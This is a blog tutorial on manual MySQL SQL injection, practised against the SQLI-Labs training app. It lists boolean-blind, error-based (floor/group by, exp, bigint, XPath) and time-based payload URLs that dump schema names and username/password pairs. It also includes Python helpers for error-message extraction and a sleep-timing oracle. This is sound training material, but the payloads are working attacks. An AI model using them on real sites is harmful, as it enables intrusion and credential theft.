Tip: This post breaks down three injection techniques (boolean blind, error-based and time-based) and works through each of them in the SQLI-Labs test environment. As most readers know, the SQLI-Labs exercises focus on SQL injection and cover many variants; if you want to learn manual SQL injection, set it up locally and test there.

Outline:
I. Boolean blind injection: left(); ascii() and substr(); ord() and mid(); regexp
II. Error-based injection: count() & floor(rand()) & group by; exp(); bigint overflow; XPath errors via extractvalue() and updatexml()
III. Time-based blind injection: sleep(); if(condition,true,false)

I. Boolean blind injection

1.1. left()

Syntax: left(str,n) compared against a string, e.g. left(str,1)>'5'

Explanation: str is the string being probed (it may be the version string, the database name, and so on). The number 1 means "take the first character"; to probe the second character, change it to 2. Note, however, that left(str,2) returns two characters, so the string you compare against must start with the first character you have already established.

Example:
database() is actually 'security';
left(database(),1)='s' is true: the page gives its "true" response, so the first character is 's'
left(database(),2)='se' the first character must be included, otherwise the comparison is false; keep this in mind

1.1.1. Guessing the current database

1.1.1.1. Guessing the first character

URL: test whether the first character is greater than 'i'
http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),1)>'i'--+
URL: confirm that the first character is 's'
http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),1)='s'--+

1.1.1.2. Guessing the second character

URL: the first character must be included so that the second one can be tested;
http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),2)='se'--+
URL: there is no ninth character, so left() just returns the whole 8-character name and the comparison is false (the page shows its "false" response), as in the URL below.
http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),9)>'securitya'--+

1.1.2. Guessing the other databases

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select schema_name from information_schema.schemata limit 0,1),1)='i'--+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select schema_name from information_schema.schemata limit 0,1),12)='information_'--+

1.1.2. Guessing the table names in database security: first table

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='e'--+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 0,1),3)='ema'--+

1.1.3. Guessing the table names in database security: second table

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 1,1),1)='r'--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 1,1),2)='re'--+

The remaining tables can be guessed the same way (they include users and others); this is not worked through here.

1.1.4. Guessing the column names of table users

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i'--+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id'--+

The other column names: id, username, password

1.1.5. Guessing the data in a column

URL: note that the first username is "Dumb" with an upper-case D, but this comparison cannot tell the case apart;
http://sqli-labs.me:8888/Less-6/?id=1" and left((select username from security.users limit 0,1),1)='d'--+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select username from security.users limit 0,1),2)='du'--+

Advice: do not use left() to guess row data. The string comparison runs under the column's collation, and MySQL's default collations are case-insensitive (the _ci suffix), so 'd' and 'D' compare equal and you cannot tell which letters are upper case. Use the ascii() comparison below instead, which compares a number; the remaining characters are not guessed here for that reason.

1.2. ascii() and substr()

Syntax:
ascii(string)>ascii code           converts the first character to its ASCII code so it can be compared with a number;
substr(string,start,length)       takes `length` characters from the string starting at position `start` (1-based);

The payload below uses this to obtain a table name in the current database:

ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
//note: database() was already obtained above;

ASCII table: http://ascii.911cha.com/

1.2.1. Guessing the current database name: first character

URL: 115 -> 's'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),1,1))=115 --+
Another URL: 101 -> 'e'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),2,1))=101 --+

Note: past the end of the string substr() returns the empty string and ascii('') returns 0, so even a comparison against the lowest printable code is false; that tells you the string has been fully extracted.

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),9,1))>65 --+

1.2.2. Guessing table names: first table, first character

URL: 101 -> 'e'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+
Another URL: 109 -> 'm'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109 --+

Change the position and code as above to continue; the tables include users, emails and others.

1.2.4. Guessing the column names of table users: first character

URL: 105 -> 'i'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105 --+
Another URL: 100 -> 'd'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))=100 --+

The rest is not tested here; the columns are id, admin, username, password and so on, and we are mainly interested in username and password.

1.2.5. Guessing column data, username and password: first character

URL: note that left() could not tell the case apart; here 68 -> 'D'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select username from security.users limit 0,1),1,1))=68 --+
Another URL: 117 -> 'u'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select username from security.users limit 0,1),2,1))=117--+

1.3. ord() and mid()

The boolean blind techniques above already recover the database, table and column names; ord() and mid() do the same job as ascii() and substr() (ord() returns the code of the first character, for a multi-byte character it is the combined byte value).

Syntax:
ord(string)     converts the first character to its character code;
mid((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1)    takes the first character of the first row of the column; the IFNULL(...,0x20) wrapper turns a NULL value into a space so the comparison does not itself become NULL;
mid(column_name,start[,length])

1.3.1. Dumping the current database: first character

URL: code of the first character (115 -> 's')
http://sqli-labs.me:8888/Less-6/?id=1" and ord(mid((select database()),1,1))=115--+
Another URL: 101 -> 'e'
http://sqli-labs.me:8888/Less-6/?id=1" and ord(mid((select database()),2,1))=101--+

The remaining statements follow the ones above.

1.4. regexp

With the methods above we already have the database and table names; the next step is the column names. The regular-expression method also relies on the page's true/false behaviour, but matches a pattern instead of a single character. Note that MySQL's regexp is case-insensitive for non-binary strings, so like left() it cannot distinguish upper from lower case.

Syntax: <expression> regexp '^...'
Example: and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+
(when no column matches, the subquery returns no row, 1=NULL is not true and the page shows its "false" response)

1.4.1. Guessing the current database name

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 and database() regexp '^[a-z]' limit 0,1) --+
Another URL ('^[s-s]' is the same as '^s'):
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 and database() regexp '^[s-s]' limit 0,1) --+

1.4.2. Guessing table names in the database

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-s]' limit 0,1) --+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[e-e]' limit 0,1) --+

1.4.3. Guessing column names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^[a-z]' limit 0,1) --+

Continue the rest yourself.

II. Error-based injection

2.1. count(), floor(rand()) and group by errors

The mechanism behind the count(*), floor(rand(0)*2) and group by error is analysed separately in "MySQL error-based injection: floor, count, group by"; the statements can be built as shown below. The leaked value appears in the "Duplicate entry '...' for key 'group_key'" error message, and the table in the FROM clause needs at least three rows for the key collision to be guaranteed, which is why information_schema.columns is used. The injection-detection step is omitted here.

2.1.0. Current database account

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select user()),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

2.1.1. Dumping database names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select schema_name from information_schema.schemata limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select schema_name from information_schema.schemata limit 6,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

2.1.2. Dumping table names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

2.1.3. Dumping column names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

2.1.4. Dumping column data

URL: this payload only extracts one column at a time
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select username from security.users limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select password from security.users limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

2.1.5. Dumping column data (two columns at once)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select distinct concat(0x3a,username,0x3a,password,0x3a) from security.users limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Another URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select distinct concat(0x3a,username,0x3a,password,0x3a) from security.users limit 1,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

Note: the only difference from the single-column payload is that the inner subquery selects distinct concat(0x3a,username,0x3a,password,0x3a) instead of one column, so both values come out in one error message.

2.2. exp() errors

exp(x) returns e (the base of the natural logarithm) raised to the power x. The bitwise negation ~ of the subquery's value is the largest BIGINT UNSIGNED, exp() of that overflows the DOUBLE range, and the resulting error message echoes the offending expression with the subquery's value in it. This only works on MySQL builds that print the evaluated subquery in the out-of-range error; newer releases print the expression text instead and leak nothing. For details see "MySQL injection: exp() error-based injection".

URL: note: the exp() payload is part of a union, so you must know the number of columns in the original query; here there are three (id, username, password)

http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+

If the column count is wrong you get a different error ("The used SELECT statements have a different number of columns") instead of the data;

URL:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),3--+

2.2.1. Dumping database names

First database:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 0,1)a))),2,3--+
Second database:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 1,1)a))),2,3--+
Third database:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 2,1)a))),2,3--+
Fourth database:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 3,1)a))),2,3--+
Fifth database:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 4,1)a))),2,3--+

2.2.2. Dumping table names

First table:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT table_name from information_schema.tables where table_schema='security' limit 0,1)a))),2,3--+
Third table:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT table_name from information_schema.tables where table_schema='security' limit 2,1)a))),2,3--+

2.2.3. Dumping column names

First column name:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT column_name from information_schema.columns where table_name='users' limit 0,1)a))),2,3--+
Third column name:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT column_name from information_schema.columns where table_name='users' limit 2,1)a))),2,3--+

2.2.4. Dumping column data (single column)

First row: note that only the username column is dumped here;
http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT username from security.users limit 0,1)a))),2,3 --+
Second row:
http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT username from security.users limit 1,1)a))),2,3 --+

2.2.5. Dumping two columns

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT distinct concat(0x3a,username,0x3a,password) from security.users limit 0,1)a))),2,3 --+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT distinct concat(0x3a,username,0x3a,password) from security.users limit 1,1)a))),2,3 --+

2.3. bigint overflow

!(subquery) evaluates to 0 or 1 and ~0 is 18446744073709551615, the largest BIGINT UNSIGNED; subtracting the latter from the former overflows and the "BIGINT UNSIGNED value is out of range" error echoes the expression together with the subquery's value. As with exp(), this depends on a MySQL version that prints the evaluated value in the message. The full explanation is in "MySQL injection: bigint overflow error-based injection".

2.3.1. Dumping the current database and user

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select database())x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select user())x) - ~0),2,3--+

2.3.2. Dumping database names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select schema_name from information_schema.schemata limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select schema_name from information_schema.schemata limit 6,1)x) - ~0),2,3--+

2.3.3. Dumping table names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select table_name from information_schema.tables where table_schema='security' limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select table_name from information_schema.tables where table_schema='security' limit 1,1)x) - ~0),2,3--+

2.3.4. Dumping column names (table users)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select column_name from information_schema.columns where table_name='users' limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select column_name from information_schema.columns where table_name='users' limit 1,1)x) - ~0),2,3--+

2.3.5. Dumping column data (single column, username)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select username from security.users limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select username from security.users limit 1,1)x) - ~0),2,3--+

2.3.6. Dumping column data (two columns)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select distinct concat(0x3a,username,0x3a,password) from security.users limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select distinct concat(0x3a,username,0x3a,password) from security.users limit 1,1)x) - ~0),2,3--+

2.4. XPath error-based injection

The main thing to remember is that extractvalue() takes two arguments while updatexml() takes three, so build the statements accordingly. Both raise an "XPATH syntax error" when the XPath string is not valid (the 0x7e '~' makes it invalid), and the message shows at most 32 characters of that string, so longer values have to be read in pieces with substr().

2.4.1. XPath injection with extractvalue()

mysql> select extractvalue(1,concat(0x7e,(select database()),0x7e));

2.4.1.1. Dumping the current database

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select user()),0x7e))--+

2.4.1.2. Dumping database names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e))--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 6,1),0x7e))--+

2.4.1.3. Dumping table names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e))--+

Adjust the limit offset to read the other tables.

2.4.1.4. Dumping column names

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e))--+

2.4.1.5. Dumping data (single column)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e))--+

2.4.1.6. Dumping two columns (username, password)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select distinct concat(0x3a,username,0x3a,password) from security.users limit 1,1),0x7e))--+

2.4.2. XPath injection with updatexml()

2.4.2.1. Dumping the current database name

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

2.4.2.3. Dumping table names (database security)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1)--+

2.4.2.4. Dumping column names (table users)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1)--+

2.4.2.5. Dumping column data (single column)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 1,1),0x7e),1)--+

2.4.2.6. Dumping column data (two columns)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select distinct concat(0x3a,username,0x3a,password) from security.users limit 1,1),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select distinct concat(0x3a,username,0x3a,password) from security.users limit 2,1),0x7e),1)--+
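The error-based payloads in 2.1 and 2.4 leave the extracted value inside a MySQL error message, and the XPath variant cuts that message off after 32 characters, so a concatenated username:password pair or a group_concat() of table names is silently truncated. The script below is an added example (not code from the original post or from SQLI-Labs) that pulls the value out of both message formats and reads long values through extractvalue() in 30-character pages, so that the closing 0x7e marker is always visible and a cut-off page is detected rather than mistaken for the whole value. The fetch callable and the local_xpath_server stand-in (which evaluates only the substr() in the payload against a constructed secret) are assumptions made for the demo; against a live lab, fetch would perform the HTTP request and return the body.

```python
import re

CHUNK = 30  # '~' + 30 data characters + '~' = 32 characters, the most an XPATH error shows


def xpath_payload(expr: str, offset: int, chunk: int = CHUNK) -> str:
    """extractvalue() payload in the Less-6 double-quote context, paging `expr` with substr()."""
    return f'1" and extractvalue(1,concat(0x7e,substr(({expr}),{offset},{chunk}),0x7e))--+'


XPATH_RE = re.compile(r"XPATH syntax error: '~([^']*?)~'")
DUP_RE = re.compile(r"Duplicate entry '(.*?)' for key")


def parse_xpath_error(body: str):
    """Text between the two 0x7e markers, or None when there is no XPATH error or the
    closing ~ was cut off by the 32-character limit (the value was too long)."""
    m = XPATH_RE.search(body)
    return m.group(1) if m else None


def parse_group_key_error(body: str):
    """Value leaked by the count()/floor(rand(0)*2)/group by collision of 2.1: the duplicate
    key is concat(0x3a,<value>,0x3a,<0 or 1>), so the trailing floor() digit is dropped."""
    m = DUP_RE.search(body)
    return m.group(1)[:-1] if m else None


def dump_via_xpath(fetch, expr: str) -> str:
    """fetch(payload) returns the page body. Reads `expr` page by page until a short page."""
    parts, offset = [], 1
    while True:
        chunk = parse_xpath_error(fetch(xpath_payload(expr, offset)))
        if chunk is None:
            raise RuntimeError(f"no complete XPATH error at offset {offset}: truncated or not vulnerable")
        parts.append(chunk)
        if len(chunk) < CHUNK:
            return "".join(parts)
        offset += CHUNK


def local_xpath_server(secret: str):
    """Offline stand-in for the lab (assumption for the demo): evaluates only the substr()
    in our payload against a constructed secret and truncates the error text to 32
    characters exactly as MySQL does."""
    pat = re.compile(r"substr\(\(.*?\),(\d+),(\d+)\)")

    def fetch(payload: str) -> str:
        m = pat.search(payload)
        off, ln = int(m.group(1)), int(m.group(2))
        value = "~" + secret[off - 1:off - 1 + ln] + "~"
        return f"<b>XPATH syntax error: '{value[:32]}'</b>"

    return fetch


if __name__ == "__main__":
    # Constructed sample: the table list of 'security' as a single group_concat() string.
    tables = ":security:users:emails:referers:uagents:"
    print(dump_via_xpath(local_xpath_server(tables), "group_concat(table_name)"))
```

The same paging works unchanged for updatexml(), which produces the identical "XPATH syntax error" message; only the payload builder needs its third argument.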

III. Time-based blind injection

Time-based blind injection is also called delay injection: it uses the time the page takes to respond to decide whether an injection point exists and, later, to extract data.
It relies only on the change in request time, so it is the technique to fall back on when neither the page's true/false behaviour nor error messages can be used.
Delay injection gives the most unambiguous answers, but its drawback is obvious: it is slow, since every true answer costs a full delay.
Common functions:
sleep()  // delay
if(condition,true,false)  // conditional
ascii()=ascii code  // convert a character to its ASCII code
substr("string",start,length)  // mid() is the same: take `length` characters of the string starting at position `start`
Principle: when the guessed ASCII code of the target character is correct the query sleeps, otherwise it returns immediately. Worked example and breakdown:
0. mysql> select if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1);
1. select schema_name from information_schema.schemata limit 0,1  // the first database name
2. substr('string',1,1)  // the substring of length 1 starting at the first character, i.e. the first character
3. ascii(substr(...))=ascii code  // convert that character to its code and compare
4. if(step 3,sleep(5),1)  // if the comparison is true, sleep() runs and the response is delayed by five seconds; if it is false, the query returns 1 immediately
Summary: this can be combined with the other techniques to recover the databases, tables and so on. Delay injection is laborious, but it is accurate enough to pin down each character reliably.

3.1. Time-based blind injection in practice

This uses Less-10 of SQLI-Labs. To make the effect visible, watch the browser's loading indicator stall while the delayed request is in flight, or use Burp Suite, which shows the response time.

3.1.1. Open Less-10

URL:
http://sqli-labs.me:8888/Less-10/?id=1

3.1.2. Test for injection with a double quote

URL: the browser stalls for about five seconds. Watch out for network instability, otherwise ordinary latency is easily confused with the injected delay;
http://sqli-labs.me:8888/Less-10/?id=1" and sleep(5)--+

3.1.3. Guessing the current database name: first character

URL: 115 -> s
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid(database(),1,1))=115,sleep(5),1)--+

3.1.4. Guessing the second character of the database name

URL: 101 -> e
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid(database(),2,1))=101,sleep(5),1)--+

The rest is not continued here; the database is security (Burp Suite's Repeater is convenient for these tests).

3.1.5. Guessing table names: first table, first character

URL: 101 -> e
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)--+

The remaining tables are not covered here; they include emails, users and others.

3.1.6. Guessing the column names of table users: first column, first character

URL: 105 -> i
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,sleep(5),1)--+

Test the rest yourself by changing the position and code; the columns are id, username, password.

3.1.7. Guessing column data: first character of username

URL: 68 -> D
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select username from security.users limit 0,1),1,1))=68,sleep(5),1)--+

Set up the environment and test the other columns yourself.
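The warning in 3.1.2 about network instability is the practical problem with delay injection: a single slow response looks exactly like a true answer. The class below is an added example (not code from the original post or from SQLI-Labs) of a timing oracle for the if(ord(mid(...)),sleep(),1) payloads of 3.1: it first measures the normal round-trip with a condition that is never true, puts the decision threshold halfway between that baseline and baseline plus the sleep, and takes a majority vote over several samples so one jittery request does not flip the answer. The fetch callable, the injectable clock and the simulated_lab stand-in (a fake Less-10 with a fake clock and constructed random jitter) are assumptions for the offline demo; against a live lab, fetch would issue the HTTP request and the default time.monotonic clock would be used.

```python
import random
import re
import time
from statistics import median


def time_payload(expr: str, pos: int, op: str, value: int, delay: int) -> str:
    """Less-10 style condition: if(ord(mid((expr),pos,1)) op value, sleep(delay), 1)."""
    return f'1" and if(ord(mid(({expr}),{pos},1)){op}{value},sleep({delay}),1)--+'


class TimingOracle:
    """Turns response times into true/false answers. fetch(payload) performs one request;
    clock is injectable so the offline demo runs without real sleeping."""

    def __init__(self, fetch, delay: int = 5, clock=time.monotonic, samples: int = 3):
        self.fetch, self.delay, self.clock, self.samples = fetch, delay, clock, samples
        self.baseline = None

    def _elapsed(self, payload: str) -> float:
        start = self.clock()
        self.fetch(payload)
        return self.clock() - start

    def calibrate(self, rounds: int = 5) -> float:
        """Median round-trip of a request whose condition is never true, so the threshold
        sits halfway between ordinary latency and latency plus the injected delay."""
        never = f'1" and if(1=2,sleep({self.delay}),1)--+'
        self.baseline = median(self._elapsed(never) for _ in range(rounds))
        return self.baseline

    def ask(self, expr: str, pos: int, op: str, value: int) -> bool:
        if self.baseline is None:
            self.calibrate()
        threshold = self.baseline + self.delay / 2
        payload = time_payload(expr, pos, op, value, self.delay)
        slow = sum(self._elapsed(payload) >= threshold for _ in range(self.samples))
        return slow * 2 > self.samples      # majority vote absorbs a single jittery sample


def simulated_lab(secret: str, seed: int = 1):
    """Offline stand-in for Less-10 (assumption for the demo): every request costs 0.2-1.8 s
    of constructed jitter on a fake clock, plus `delay` seconds when the condition is true.
    Returns (fetch, clock) for TimingOracle."""
    rng, now = random.Random(seed), [0.0]
    cond = re.compile(r"ord\(mid\(\(.*?\),(\d+),1\)\)(>|=)(\d+),sleep\((\d+)\)")

    def fetch(payload: str) -> None:
        now[0] += rng.uniform(0.2, 1.8)
        m = cond.search(payload)
        if not m:                           # calibration payload: 1=2 never sleeps
            return
        pos, op, value, delay = int(m.group(1)), m.group(2), int(m.group(3)), int(m.group(4))
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0   # mid() past the end: ord('') is 0
        if (code > value) if op == ">" else (code == value):
            now[0] += delay

    return fetch, (lambda: now[0])


if __name__ == "__main__":
    fetch, clock = simulated_lab("security")
    oracle = TimingOracle(fetch, delay=5, clock=clock)
    print("baseline %.2fs" % oracle.calibrate())
    print("first char is 's':", oracle.ask("database()", 1, "=", 115))
```

With a baseline of at most 1.8 s and a 5 s sleep the threshold lands around 4 s, so a false answer (under 2 s) and a true one (over 5 s) never overlap; on a real network, pick the delay so that the same separation holds, and lengthen it rather than shorten it when the calibrated baseline is noisy.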

© Copyright 2019  

Powered by  si1ent  

皖ICP备19004273